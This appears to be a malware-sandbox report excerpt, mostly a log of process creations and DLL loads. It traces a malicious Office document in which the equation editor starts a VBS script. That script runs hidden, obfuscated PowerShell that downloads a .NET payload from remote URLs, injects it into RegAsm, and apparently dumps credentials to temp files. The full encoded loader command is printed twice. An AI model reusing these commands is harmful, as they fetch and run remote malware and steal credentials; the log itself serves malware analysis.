                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
